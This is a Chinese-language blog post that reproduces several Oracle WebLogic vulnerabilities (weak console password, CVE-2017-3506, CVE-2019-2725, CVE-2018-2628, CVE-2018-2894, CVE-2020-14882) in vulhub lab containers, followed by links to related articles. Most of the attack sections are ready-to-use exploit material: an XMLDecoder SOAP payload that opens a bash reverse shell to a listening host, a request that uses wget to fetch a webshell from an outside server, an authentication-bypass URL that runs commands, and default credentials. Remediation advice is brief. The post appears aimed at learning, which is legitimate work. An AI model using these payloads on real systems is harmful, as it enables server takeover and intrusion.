常见中间件漏洞:WebLogic篇

已于 2025-03-23 23:01:45 修改
阅读量1.9k 收藏 46
点赞数 50
CC 4.0 BY-SA版权
文章标签: 中间件 weblogic 漏洞
于 2025-03-23 22:55:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_77611368/article/details/146457983

Weblogic介绍

WebLogic 是 Oracle 公司开发的一款企业级 Java EE(Java Platform, Enterprise Edition)应用服务器,广泛用于构建、部署和管理分布式企业级应用程序。它是 Java EE 规范的主要实现之一,支持高可用性、可扩展性和安全性,适用于大型企业和关键业务系统。

一、后台弱口令GetShell

描述

通过弱口令进⼊后台界面 , 上传部署war包 , getshell

影响范围

全版本(存在弱口令)

靶场搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

步骤

默认账号密码:weblogic/Oracle@123(ps:单个账号错误密码5次之后就会自动锁定)

打开网站

http://8.130.17.222:7001/console/login/LoginForm.jsp
依次点击部署--安装
准备war包(准备过程参考上一期)
然后一直点击下一步,最后点击完成,访问文件
哥斯拉链接即可

二、 CVE-2017-3506

描述

Weblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder来解析用户输入的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。

影响范围

WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。

靶场搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

步骤

访问以下目录中的⼀种,有回显如下图可以判断wls-wsat组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

1.验证是否存在wls-wsat组件(出现如下界面即存在)

监听自己端口

当前页面抓包

把请求方法修改为post

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <object class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/8.130.17.222/6666 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

点击发送后即可监听到

修复

更新到最新版本,打上10271的补丁,对访问wls-wsat的资源进行访问控制

三、CVE-2019-2725

描述

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该 WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

影响范围

weblogic 10.x weblogic 12.1.3

靶场搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

步骤

1.漏洞验证

http://124.221.58.83:7001/_async/AsyncResponseService

如果出现⼀下页⾯,则说明存在漏洞

在页面抓包,修改请求包 , 写⼊shell
POST /_async/AsyncResponseService HTTP/1.1
Host: 124.221.58.83:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 839
SOAPAction:
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:wsa="http://www.w3.org/2005/08/addressing"
                  xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                    <void index="0">
                        <string>/bin/bash</string>
                    </void>
                    <void index="1">
                        <string>-c</string>
                    </void>
                    <void index="2">
                        <string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp</string>
                    </void>
                </array>
                <void method="start"/>
            </void>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
        <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>

访问并连接http://124.221.58.83:7001/bea_wls_internal/678.jsp

四、CVE-2018-2628

描述

是 Oracle WebLogic Server 中的一个高危反序列化漏洞。攻击者可以通过 T3 协议向 WebLogic Server 发送恶意序列化数据,从而在目标服务器上执行任意代码,获取系统控制权限。

影响范围

Oracle WebLogic Server10.3.6.0.0

Oracle WebLogic Server12.1.3.0.0

Oracle WebLogic Server12.2.1.2.0

Oracle WebLogic Server12.2.1.3.0

靶场搭建

cd vulhub-master/weblogic/CVE-2018-2628

docker-compose up -d

步骤

 
使用工具即可

修复

1. 及时更新补丁 ;

2. 禁⽤T3协议 ;

3. 禁⽌T3端口对外开放,或者限制可访问T3端口的IP来源。

4. 升级版本

五、CVE-2018-2894

描述

Weblogic Web Service Test Page中⼀处任意文件上传漏洞,Web Service Test Page 在 "生产模式" 下默认不开启,所以该漏洞有⼀定限制。

影响范围

weblogic 10.3.6.0

weblogic 12.1.3.0

weblogic 12.2.1.2

28weblogic 12.2.1.3

靶场搭建

cd vulhub-master/weblogic/CVE-2018-2894

docker-compose up -d

步骤

这里环境后台密码是随机得,获取密码: 

docker-compose logs | grep password
设置web服务测试开启: 域结构 -> base-domain -> 高级 -> 启动Web服务测试页
访问这个网站
把工作目录改为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

点击安全--添加

源代码找到数字,复制

访问shell的地址(把数字部分替换为上面复制的数字)

http://8.130.17.222:7001/ws_utc/css/config/keystore/1742738211740_1.jsp

链接即可

六、CVE-2020-14882

描述

32CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。

CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执行任何命令。

使用这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机

影响范围

Oracle Weblogic Server 10.3.6.0

Oracle Weblogic Server 12.1.3.0

Oracle Weblogic Server 12.2.1.3

Oracle Weblogic Server 12.2.1.4

Oracle Weblogic Server 14.1.1.0

靶场搭建

cd vulhub-master/weblogic/CVE-2020-14882

docker-compose up -d

步骤

1.访问管理控制台 
http://8.130.17.222:7001/console/login/LoginForm.jsp
2.使⽤以下url绕过登录认证(一次不行就再试一次)
http://8.130.17.222:7001/console/css/%252e%252e%252fconsole.portal

 

先看一下容器内部文件

 访问下面网址(404就再试一次)

http://8.130.17.222:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

 出行success文件说明成功了

常见中间件漏洞(二、WebLogin合集)
2301_76631050的博客
08-06 2102
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
常见中间件漏洞:WebLogic
m0_63944205的博客
08-06 1519
Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序(客户端或者其它 Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开 启, 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在漏洞weblogic组件 的远程代码执⾏攻击。此时达到未授权得效果。
weblogic漏洞复现学习
m0_64777251的博客
04-16 1443
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
最新发布
Python84310366的博客
06-13 1200
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
介绍一些 Weblogic 常见漏洞
优快云大数据
05-24 921
介绍 Weblogic 常见漏洞,其中包括:弱口令、Java 反序列化、XMLdecoder 反序列化、SSRF 漏洞、任意文件上传,并根据其漏洞,使用 Docker+...
Weblogic 常见漏洞汇总
热门推荐
box
04-20 1万+
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506) 0x00 漏洞描述 网上爆出weblogic的WLS组件存在xmldecoder
Weblogic常见漏洞详解
m0_64481831的博客
03-01 4982
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 1万+
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
常见中间件漏洞总结PPT
01-25
中间件领域,常见的产品包括WebLogic、Tomcat、Nginx、IIS(Internet Information Services)、JBoss等。 1. WebLogic是Oracle公司的一个Java EE应用服务器,它支持企业级应用的部署和运行。WebLogic漏洞往往...
常见中间件漏洞复现之【WebLogic】!
muyuchen110的博客
08-06 1506
Weblogic介绍WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。后台弱口令GetShell漏洞描述影响范围环境搭建漏洞复现登录后台后,点击部署,点击安装,点击上传文件。
常见中间件漏洞复现
君莫hacker的博客
11-08 9327
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
常见框架漏洞 下(Weblogic、Jboss)
2301_76631050的博客
08-08 1490
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。
weblogic-SSRF
anna11119的博客
07-26 709
https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf Weblogic SSRF漏洞 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 测试环境搭建 编译及启动测试环境 docker-compose build docker-comp...
漏洞复现】WebLogic中间件漏洞
qq_48368964的博客
08-06 1340
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
weblogic漏洞
scu_hacker博客
01-17 4353
目录 前言 一、任意文件上传 1.1影响范围 1.2 漏洞详情 二、弱口令+后台war包 三、ssrf漏洞 3.1影响范围 3.2 漏洞详情 四、反序列化漏洞 总结 前言 weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,本文介绍常见的几个weblogic漏洞原理、复现。 一、任意文件上传 1.1影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 .
[Java安全]—weblogic常见漏洞
Sentiment的博客
07-11 3574
本来想跟一些T3反序列化的,奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问,进入后台弱口令直接登录weblogic常用弱口令: htt
weblogic中间件漏洞汇总
混子
11-24 9485
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值